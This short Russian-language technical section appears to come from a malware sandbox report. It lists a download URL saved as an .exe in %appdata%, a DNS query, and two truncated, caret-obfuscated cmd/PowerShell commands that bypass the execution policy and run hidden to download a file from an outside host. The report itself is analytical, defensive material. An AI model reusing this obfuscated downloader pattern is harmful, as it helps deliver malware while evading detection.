Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRSH^Ell^.EXE^ -e^x^E^Cution^Pol^I^CY b^Y^Pa^S^S -nOPr^ofi^lE^ ^-wInDO^w^st^YL^e HI^DDe^n ^(New^-Ob^Je^c^T ^s^ys^Tem^.^Net.W^Ebc^lIenT).DO^wn^lO^ADF^iLe^('http://www.zoerpole...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "PoweRSH^Ell^.EXE^ -e^x^E^Cution^Pol^I^CY b^Y^Pa^S^S -nOPr^ofi^lE^ ^-wInDO^w^st^YL^e HI^DDe^n ^(New^-Ob^Je^c^T ^s^ys^Tem^.^Net.W^Ebc^lIenT).DO^wn^lO^ADF^iLe^('http://www.zoerpole...' (со скрытым окном)